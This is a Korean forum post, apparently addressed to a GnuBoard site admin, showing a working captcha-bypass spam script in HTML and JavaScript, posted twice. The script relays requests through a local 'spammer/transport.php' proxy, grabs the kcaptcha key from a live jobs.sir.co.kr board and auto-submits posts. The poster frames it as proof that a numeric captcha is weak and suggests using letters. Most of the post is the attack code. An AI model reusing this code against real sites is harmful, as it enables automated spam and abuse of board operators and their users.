관리자님 성공했습니다.... 정보
관리자님 성공했습니다....- jacobswell 자기소개 아이디로 검색 회원게시물 (211.♡.♡.36)
- 2,211
본문
오직 php와 javascript로 성공했습니다. 확인해보세요. ^^
추천
0
0
댓글 2개
<!-- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> -->
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title>1 > sdfsdfsdfsdfsdf > 글쓰기</title>
</head>
<script type="text/javascript" src="./md5.js"></script>
<body topmargin="0" leftmargin="0" >
그누보드에 글을 올려볼까요...
<button id="post_btn" onclick="post();">글 올리기</button> <input type="text" value="" size="5" id="display_key" /><br />
<script type="text/javascript">
function getHttpRequest()
{
var req = null;
if (window.ActiveXObject) {
try {
req = new ActiveXObject("Msxml2.XMLHTTP"); // 5.0 이후 버전
}
catch(e) {
try {
req = new ActiveXObject("Microsoft.XMLHTTP"); // 5.0 이전 버전
}
catch(e1) {
req = null;
}
}
}
else if (window.XMLHttpRequest) {
try {
req = new XMLHttpRequest();
}
catch (e) {
req = null;
}
}
return req;
}
var data = {
'id': '',
'name': '임시자',
'password': '1234',
'subject': 'spammer',
'content': 'spam content'
};
var phpsessid = '';
var req = getHttpRequest();
function post()
{
var url = 'http://localhost/spammer/transport.php?transport_url='+encodeURI('http://jobs.sir.co.kr/gnu4/bbs/kcaptcha_session.php')+'&transport_method=get&transport_phpsessid=true&transport_kcaptcha=true';
document.getElementById('display_key').value = '';
req.open('GET', url, false);
req.onreadystatechange = function() {
if (req.readyState == 4) {
if (req.status == 200) {
//alert(req.responseText);
var json_data = eval('('+req.responseText+')');
if (json_data.key) {
document.getElementById('display_key').value = json_data.key;
process(json_data.key);
}
}
}
};
req.send(null);
}
function process(key)
{
var j = Math.floor(Math.random()*10000)+1;
send('테스트'+j.toString(), '테스트 본문 '+j.toString(), key);
}
function send(subject, content, key)
{
var url = 'http://localhost/spammer/transport.php';
var param = 'transport_url='+encodeURI('http://jobs.sir.co.kr/gnu4/bbs/write_update.php')+'&transport_method=post&transport_noresponse=true';
param += '&wr_name='+encodeURI(data.name)+'&mb_id='+encodeURI(data.id)+'&mb_password='+encodeURI(data.password);
param += '&wr_subject='+encodeURI(subject);
param += '&wr_content='+encodeURI(content);
param += '&wr_key='+encodeURI(key);
param += '&w=&bo_table=dsfdfsdfsdsdf&wr_id=';
req.open('POST', url, false);
req.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
req.setRequestHeader('content-length', param.length);
req.setRequestHeader('Connection', 'close');
req.onreadystatechange = function() {
if (req.readyState == 4) {
if (req.status == 200) {
pause(1500);
}
}
};
req.send(param);
}
// 그냥 n millis 동안 멈추기
function pause(milis)
{
var now = new Date();
var exitTime = now.getTime()+milis;
while (true) {
now = new Date();
if (now.getTime() > exitTime) return;
}
}
</script>
</body>
</html>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title>1 > sdfsdfsdfsdfsdf > 글쓰기</title>
</head>
<script type="text/javascript" src="./md5.js"></script>
<body topmargin="0" leftmargin="0" >
그누보드에 글을 올려볼까요...
<button id="post_btn" onclick="post();">글 올리기</button> <input type="text" value="" size="5" id="display_key" /><br />
<script type="text/javascript">
function getHttpRequest()
{
var req = null;
if (window.ActiveXObject) {
try {
req = new ActiveXObject("Msxml2.XMLHTTP"); // 5.0 이후 버전
}
catch(e) {
try {
req = new ActiveXObject("Microsoft.XMLHTTP"); // 5.0 이전 버전
}
catch(e1) {
req = null;
}
}
}
else if (window.XMLHttpRequest) {
try {
req = new XMLHttpRequest();
}
catch (e) {
req = null;
}
}
return req;
}
var data = {
'id': '',
'name': '임시자',
'password': '1234',
'subject': 'spammer',
'content': 'spam content'
};
var phpsessid = '';
var req = getHttpRequest();
function post()
{
var url = 'http://localhost/spammer/transport.php?transport_url='+encodeURI('http://jobs.sir.co.kr/gnu4/bbs/kcaptcha_session.php')+'&transport_method=get&transport_phpsessid=true&transport_kcaptcha=true';
document.getElementById('display_key').value = '';
req.open('GET', url, false);
req.onreadystatechange = function() {
if (req.readyState == 4) {
if (req.status == 200) {
//alert(req.responseText);
var json_data = eval('('+req.responseText+')');
if (json_data.key) {
document.getElementById('display_key').value = json_data.key;
process(json_data.key);
}
}
}
};
req.send(null);
}
function process(key)
{
var j = Math.floor(Math.random()*10000)+1;
send('테스트'+j.toString(), '테스트 본문 '+j.toString(), key);
}
function send(subject, content, key)
{
var url = 'http://localhost/spammer/transport.php';
var param = 'transport_url='+encodeURI('http://jobs.sir.co.kr/gnu4/bbs/write_update.php')+'&transport_method=post&transport_noresponse=true';
param += '&wr_name='+encodeURI(data.name)+'&mb_id='+encodeURI(data.id)+'&mb_password='+encodeURI(data.password);
param += '&wr_subject='+encodeURI(subject);
param += '&wr_content='+encodeURI(content);
param += '&wr_key='+encodeURI(key);
param += '&w=&bo_table=dsfdfsdfsdsdf&wr_id=';
req.open('POST', url, false);
req.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
req.setRequestHeader('content-length', param.length);
req.setRequestHeader('Connection', 'close');
req.onreadystatechange = function() {
if (req.readyState == 4) {
if (req.status == 200) {
pause(1500);
}
}
};
req.send(param);
}
// 그냥 n millis 동안 멈추기
function pause(milis)
{
var now = new Date();
var exitTime = now.getTime()+milis;
while (true) {
now = new Date();
if (now.getTime() > exitTime) return;
}
}
</script>
</body>
</html>
핵심 파일은 transport.php인데요... 이걸 올리면 이제 스팸글 많이 올라오겠죠... 결국 PHPSESSID를 붙여넣는 것도 의미가 없다는 이야기입니다. 캡차를 단순히 숫자로 할 경우는 1~2초도 되지 않아 풀립니다. 캡차를 문자까지 넣는 것이 PHPSESSID를 붙이는 것보다 더 효과가 클것 같은데요...